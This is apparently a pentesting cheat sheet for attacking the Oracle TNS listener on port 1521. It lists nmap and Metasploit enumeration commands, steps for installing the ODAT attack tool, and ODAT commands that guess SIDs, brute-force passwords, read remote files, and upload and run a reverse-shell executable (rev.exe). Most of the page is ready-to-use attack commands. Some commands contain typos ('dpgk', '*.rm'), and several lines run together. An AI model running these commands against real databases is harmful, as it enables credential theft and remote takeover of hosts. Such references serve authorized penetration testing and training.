Port 1521,1522-1529 - Oracle TNS Listener
Enumeration
Basic
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version
#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>ODAT
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.
Usage examples of ODAT:
You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
You have a valid Oracle account on a database and want to escalate your privileges to become DBA or SYSDBA
You have a Oracle account and you want to execute system commands (e.g. reverse shell) in order to move forward on the operating system hosting the database
Tested on Oracle Database 10g, 11g, 12c, 18c and 19c.
Instalation
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule updateGet instant client basic, sdk (devel) and sqlplus from the Oracle web site:
sudo apt-get install libaio1 python3-dev alien python3-pip
pip3 install cx_Oracle
mv /home/kali/downloads/*.rm .
sudo alien --to-deb *.rpm
dpgk -i *Add to .zshrc
export ORACLE_HOME=/usr/lib/oracle/19.3/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATHUsage examples
# SID Enumeration
python3 odat.py sidguesser -s <IP-ADDRESS>
# User/Pass bruteforce
python3 odat.py passwordguesser -s <IP> -d <SID>
python3 odat.py passwordguesser -s <IP> --accounts-file <wordlist> -d <SID>
# Get remote/put files
python3 odat.py utlfile --getFile 'C:/Windows/System32/drivers/etc' hosts hosts -s <IP> -d <SID> -U <username > -P <password> [--sysdba]
python3 odat.py utlfile --putFile 'C:/Windows/System32' rev.exe rev.exe -s <IP> -d <SID> -U <username> -P <password> [--sysdba]
# Execute remote file
python3 odat.py externaltable --exec 'C:/Windows/System32' rev.exe Last updated